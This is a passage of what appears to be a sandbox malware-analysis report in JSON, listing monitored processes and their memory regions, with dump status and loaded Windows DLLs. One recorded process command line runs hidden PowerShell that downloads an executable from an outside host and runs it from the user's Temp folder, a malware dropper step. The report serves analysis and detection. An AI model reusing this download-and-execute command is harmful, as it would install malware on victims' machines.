2147151872, "timestamp": "00:00:47.273", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000806-addr_0x0000000002c90000-size_0x0000000000190000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_115", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1638400, "start_va": 46727168, "type": "region", "version": 1 }, "end_va": 48365567, "entry_point": 0, "filename": null, "id": "region_806", "name": "private_0x0000000002c90000", "norm_filename": null, "region_type": "private_memory", "start_va": 46727168, "timestamp": "00:00:47.283", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('http://doc2th.com/tin/off.exe', 'C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp/lambdoidtegument.exe');C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp/lambdoidtegument.exe", "filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", "id": "proc_5", "image_name": "powershell.exe", "monitor_reason": "child_process", "monitored_id": 5, "origin_monitor_id": 3, "ref_parent_process": { "ref_id": "proc_3", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "process_00000005-region_00000794-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_109", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 
0, "filename": null, "id": "region_794", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:00:47.193", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 212991, "entry_point": 0, "filename": null, "id": "region_795", "name": "pagefile_0x0000000000030000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 196608, "timestamp": "00:00:47.193", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 0, "filename": null, "id": "region_796", "name": "pagefile_0x0000000000040000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 262144, "timestamp": "00:00:47.193", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000797-addr_0x0000000000110000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_110", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 1114112, "type": "region", "version": 1 }, "end_va": 1376255, "entry_point": 0, "filename": null, "id": "region_797", "name": "private_0x0000000000110000", "norm_filename": null, "region_type": "private_memory", "start_va": 1114112, "timestamp": "00:00:47.194", "type": "region", "version": 1 }, 
{ "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 466944, "start_va": 570556416, "type": "region", "version": 1 }, "end_va": 571023359, "entry_point": 570556416, "filename": "\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "id": "region_798", "name": "powershell.exe", "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", "region_type": "memory_mapped_file", "start_va": 570556416, "timestamp": "00:00:47.194", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1294336, "start_va": 1995767808, "type": "region", "version": 1 }, "end_va": 1997062143, "entry_point": 1995767808, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_799", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 1995767808, "timestamp": "00:00:47.251", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 1998127104, "type": "region", "version": 1 }, "end_va": 1998131199, "entry_point": 1998127104, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_800", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 1998127104, "timestamp": "00:00:47.251", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in 
the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2147155968, "type": "region", "version": 1 }, "end_va": 2147299327, "entry_point": 0, "filename": null, "id": "region_801", "name": "pagefile_0x000000007ffb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2147155968, "timestamp": "00:00:47.251", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000802-addr_0x000000007ffdb000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_111", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147332096, "type": "region", "version": 1 }, "end_va": 2147336191, "entry_point": 0, "filename": null, "id": "region_802", "name": "private_0x000000007ffdb000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147332096, "timestamp": "00:00:47.251", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000803-addr_0x000000007ffdf000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_112", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147348480, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_803", "name": "private_0x000000007ffdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147348480, "timestamp": "00:00:47.251", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], 
"ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_808", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:00:47.324", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_809", "name": "pagefile_0x0000000000020000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 131072, "timestamp": "00:00:47.324", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 749567, "entry_point": 327680, "filename": "\\Windows\\System32\\locale.nls", "id": "region_810", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 327680, "timestamp": "00:00:47.324", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000811-addr_0x00000000002c0000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_116", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 2883584, "type": "region", "version": 1 }, "end_va": 3932159, "entry_point": 0, "filename": null, "id": "region_811", "name": 
"private_0x00000000002c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2883584, "timestamp": "00:00:47.325", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000812-addr_0x00000000005b0000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_117", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 5963776, "type": "region", "version": 1 }, "end_va": 6029311, "entry_point": 0, "filename": null, "id": "region_812", "name": "private_0x00000000005b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 5963776, "timestamp": "00:00:47.325", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 303104, "start_va": 1855455232, "type": "region", "version": 1 }, "end_va": 1855758335, "entry_point": 1855455232, "filename": "\\Windows\\System32\\mscoree.dll", "id": "region_813", "name": "mscoree.dll", "norm_filename": "c:\\windows\\system32\\mscoree.dll", "region_type": "memory_mapped_file", "start_va": 1855455232, "timestamp": "00:00:47.325", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 81920, "start_va": 1934163968, "type": "region", "version": 1 }, "end_va": 1934245887, "entry_point": 1934163968, "filename": "\\Windows\\System32\\atl.dll", "id": "region_814", "name": "atl.dll", "norm_filename": "c:\\windows\\system32\\atl.dll", "region_type": "memory_mapped_file", "start_va": 1934163968, "timestamp": "00:00:47.325", 
"type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 303104, "start_va": 1965424640, "type": "region", "version": 1 }, "end_va": 1965727743, "entry_point": 1965424640, "filename": "\\Windows\\System32\\KernelBase.dll", "id": "region_815", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\system32\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1965424640, "timestamp": "00:00:47.327", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 659456, "start_va": 1967259648, "type": "region", "version": 1 }, "end_va": 1967919103, "entry_point": 1967259648, "filename": "\\Windows\\System32\\rpcrt4.dll", "id": "region_816", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\system32\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 1967259648, "timestamp": "00:00:47.327", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 655360, "start_va": 1967980544, "type": "region", "version": 1 }, "end_va": 1968635903, "entry_point": 1967980544, "filename": "\\Windows\\System32\\advapi32.dll", "id": "region_817", "name": "advapi32.dll", "norm_filename": "c:\\windows\\system32\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 1967980544, "timestamp": "00:00:47.328", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", 
"executable" ], "ref_process_dump": null, "size": 585728, "start_va": 1968701440, "type": "region", "version": 1 }, "end_va": 1969287167, "entry_point": 1968701440, "filename": "\\Windows\\System32\\oleaut32.dll", "id": "region_818", "name": "oleaut32.dll", "norm_filename": "c:\\windows\\system32\\oleaut32.dll", "region_type": "memory_mapped_file", "start_va": 1968701440, "timestamp": "00:00:47.328", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1984299008, "type": "region", "version": 1 }, "end_va": 1984339967, "entry_point": 1984299008, "filename": "\\Windows\\System32\\lpk.dll", "id": "region_819", "name": "lpk.dll", "norm_filename": "c:\\windows\\system32\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 1984299008, "timestamp": "00:00:47.328", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 319488, "start_va": 1985806336, "type": "region", "version": 1 }, "end_va": 1986125823, "entry_point": 1985806336, "filename": "\\Windows\\System32\\gdi32.dll", "id": "region_820", "name": "gdi32.dll", "norm_filename": "c:\\windows\\system32\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 1985806336, "timestamp": "00:00:47.328", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 823296, "start_va": 1986134016, "type": "region", "version": 1 }, "end_va": 1986957311, "entry_point": 1986134016, "filename": "\\Windows\\System32\\user32.dll", "id": 
"region_821", "name": "user32.dll", "norm_filename": "c:\\windows\\system32\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1986134016, "timestamp": "00:00:47.328", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1425408, "start_va": 1986985984, "type": "region", "version": 1 }, "end_va": 1988411391, "entry_point": 1986985984, "filename": "\\Windows\\System32\\ole32.dll", "id": "region_822", "name": "ole32.dll", "norm_filename": "c:\\windows\\system32\\ole32.dll", "region_type": "memory_mapped_file", "start_va": 1986985984, "timestamp": "00:00:47.328", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 643072, "start_va": 1988427776, "type": "region", "version": 1 }, "end_va": 1989070847, "entry_point": 1988427776, "filename": "\\Windows\\System32\\usp10.dll", "id": "region_823", "name": "usp10.dll", "norm_filename": "c:\\windows\\system32\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 1988427776, "timestamp": "00:00:47.328", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1989083136, "type": "region", "version": 1 }, "end_va": 1989185535, "entry_point": 1989083136, "filename": "\\Windows\\System32\\sechost.dll", "id": "region_824", "name": "sechost.dll", "norm_filename": "c:\\windows\\system32\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 1989083136, "timestamp": "00:00:47.328", "type": "region", "version": 1 }, { "dump": { 
"filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 868352, "start_va": 1992359936, "type": "region", "version": 1 }, "end_va": 1993228287, "entry_point": 1992359936, "filename": "\\Windows\\System32\\kernel32.dll", "id": "region_825", "name": "kernel32.dll", "norm_filename": "c:\\windows\\system32\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1992359936, "timestamp": "00:00:47.328", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 1994653696, "type": "region", "version": 1 }, "end_va": 1995358207, "entry_point": 1994653696, "filename": "\\Windows\\System32\\msvcrt.dll", "id": "region_826", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\system32\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 1994653696, "timestamp": "00:00:47.328", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 356352, "start_va": 1997668352, "type": "region", "version": 1 }, "end_va": 1998024703, "entry_point": 1997668352, "filename": "\\Windows\\System32\\shlwapi.dll", "id": "region_827", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\system32\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 1997668352, "timestamp": "00:00:47.328", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, 
"size": 1048576, "start_va": 2137980928, "type": "region", "version": 1 }, "end_va": 2139029503, "entry_point": 0, "filename": null, "id": "region_828", "name": "pagefile_0x000000007f6f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2137980928, "timestamp": "00:00:47.328", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 819200, "start_va": 1376256, "type": "region", "version": 1 }, "end_va": 2195455, "entry_point": 0, "filename": null, "id": "region_829", "name": "pagefile_0x0000000000150000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1376256, "timestamp": "00:00:47.331", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 126976, "start_va": 1984364544, "type": "region", "version": 1 }, "end_va": 1984491519, "entry_point": 1984364544, "filename": "\\Windows\\System32\\imm32.dll", "id": "region_830", "name": "imm32.dll", "norm_filename": "c:\\windows\\system32\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 1984364544, "timestamp": "00:00:47.331", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 835584, "start_va": 1991507968, "type": "region", "version": 1 }, "end_va": 1992343551, "entry_point": 1991507968, "filename": "\\Windows\\System32\\msctf.dll", "id": "region_831", "name": "msctf.dll", "norm_filename": "c:\\windows\\system32\\msctf.dll", "region_type": "memory_mapped_file", 
"start_va": 1991507968, "timestamp": "00:00:47.331", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 786432, "type": "region", "version": 1 }, "end_va": 815103, "entry_point": 0, "filename": null, "id": "region_832", "name": "pagefile_0x00000000000c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 786432, "timestamp": "00:00:47.403", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 851968, "type": "region", "version": 1 }, "end_va": 860159, "entry_point": 0, "filename": null, "id": "region_833", "name": "pagefile_0x00000000000d0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 851968, "timestamp": "00:00:47.403", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 917504, "type": "region", "version": 1 }, "end_va": 929791, "entry_point": 917504, "filename": "\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\powershell.exe.mui", "id": "region_834", "name": "powershell.exe.mui", "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\en-us\\powershell.exe.mui", "region_type": "memory_mapped_file", "start_va": 917504, "timestamp": "00:00:47.403", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000835-addr_0x00000000000f0000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], 
"info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_118", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 983040, "type": "region", "version": 1 }, "end_va": 987135, "entry_point": 0, "filename": null, "id": "region_835", "name": "private_0x00000000000f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 983040, "timestamp": "00:00:47.404", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000836-addr_0x0000000000100000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_119", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 1048576, "type": "region", "version": 1 }, "end_va": 1052671, "entry_point": 0, "filename": null, "id": "region_836", "name": "private_0x0000000000100000", "norm_filename": null, "region_type": "private_memory", "start_va": 1048576, "timestamp": "00:00:47.404", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000837-addr_0x0000000000260000-size_0x0000000000040000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_120", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 2490368, "type": "region", "version": 1 }, "end_va": 2752511, "entry_point": 0, "filename": null, "id": "region_837", "name": "private_0x0000000000260000", "norm_filename": null, "region_type": "private_memory", "start_va": 2490368, "timestamp": "00:00:47.404", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because 
pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1052672, "start_va": 3932160, "type": "region", "version": 1 }, "end_va": 4984831, "entry_point": 0, "filename": null, "id": "region_838", "name": "pagefile_0x00000000003c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3932160, "timestamp": "00:00:47.404", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 12582912, "start_va": 6029312, "type": "region", "version": 1 }, "end_va": 18612223, "entry_point": 0, "filename": null, "id": "region_839", "name": "pagefile_0x00000000005c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 6029312, "timestamp": "00:00:47.405", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000840-addr_0x0000000001370000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_121", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 20381696, "type": "region", "version": 1 }, "end_va": 20447231, "entry_point": 0, "filename": null, "id": "region_840", "name": "private_0x0000000001370000", "norm_filename": null, "region_type": "private_memory", "start_va": 20381696, "timestamp": "00:00:47.405", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1962868736, "type": "region", "version": 1 }, "end_va": 1962917887, "entry_point": 
1962868736, "filename": "\\Windows\\System32\\cryptbase.dll", "id": "region_841", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\system32\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 1962868736, "timestamp": "00:00:47.405", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000842-addr_0x0000000001310000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_122", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 19988480, "type": "region", "version": 1 }, "end_va": 20250623, "entry_point": 0, "filename": null, "id": "region_842", "name": "private_0x0000000001310000", "norm_filename": null, "region_type": "private_memory", "start_va": 19988480, "timestamp": "00:00:47.407", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 262144, "start_va": 1945108480, "type": "region", "version": 1 }, "end_va": 1945370623, "entry_point": 1945108480, "filename": "\\Windows\\System32\\uxtheme.dll", "id": "region_843", "name": "uxtheme.dll", "norm_filename": "c:\\windows\\system32\\uxtheme.dll", "region_type": "memory_mapped_file", "start_va": 1945108480, "timestamp": "00:00:47.407", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 2228224, "type": "region", "version": 1 }, "end_va": 2232319, "entry_point": 0, "filename": null, "id": "region_844", "name": "pagefile_0x0000000000220000", "norm_filename": null, 
"region_type": "pagefile_backed_memory", "start_va": 2228224, "timestamp": "00:00:47.446", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 913408, "start_va": 5046272, "type": "region", "version": 1 }, "end_va": 5959679, "entry_point": 0, "filename": null, "id": "region_845", "name": "pagefile_0x00000000004d0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 5046272, "timestamp": "00:00:47.446", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 536576, "start_va": 1990918144, "type": "region", "version": 1 }, "end_va": 1991454719, "entry_point": 1990918144, "filename": "\\Windows\\System32\\clbcatq.dll", "id": "region_846", "name": "clbcatq.dll", "norm_filename": "c:\\windows\\system32\\clbcatq.dll", "region_type": "memory_mapped_file", "start_va": 1990918144, "timestamp": "00:00:47.446", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 2293760, "type": "region", "version": 1 }, "end_va": 2297855, "entry_point": 0, "filename": null, "id": "region_847", "name": "pagefile_0x0000000000230000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2293760, "timestamp": "00:00:47.450", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", 
"executable" ], "ref_process_dump": null, "size": 12886016, "start_va": 1971388416, "type": "region", "version": 1 }, "end_va": 1984274431, "entry_point": 1971388416, "filename": "\\Windows\\System32\\shell32.dll", "id": "region_848", "name": "shell32.dll", "norm_filename": "c:\\windows\\system32\\shell32.dll", "region_type": "memory_mapped_file", "start_va": 1971388416, "timestamp": "00:00:47.450", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 94208, "start_va": 1953824768, "type": "region", "version": 1 }, "end_va": 1953918975, "entry_point": 1953824768, "filename": "\\Windows\\System32\\userenv.dll", "id": "region_849", "name": "userenv.dll", "norm_filename": "c:\\windows\\system32\\userenv.dll", "region_type": "memory_mapped_file", "start_va": 1953824768, "timestamp": "00:00:47.454", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 45056, "start_va": 1963589632, "type": "region", "version": 1 }, "end_va": 1963634687, "entry_point": 1963589632, "filename": "\\Windows\\System32\\profapi.dll", "id": "region_850", "name": "profapi.dll", "norm_filename": "c:\\windows\\system32\\profapi.dll", "region_type": "memory_mapped_file", "start_va": 1963589632, "timestamp": "00:00:47.454", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 2359296, "type": "region", "version": 1 }, "end_va": 2367487, "entry_point": 0, "filename": null, "id": "region_851", 
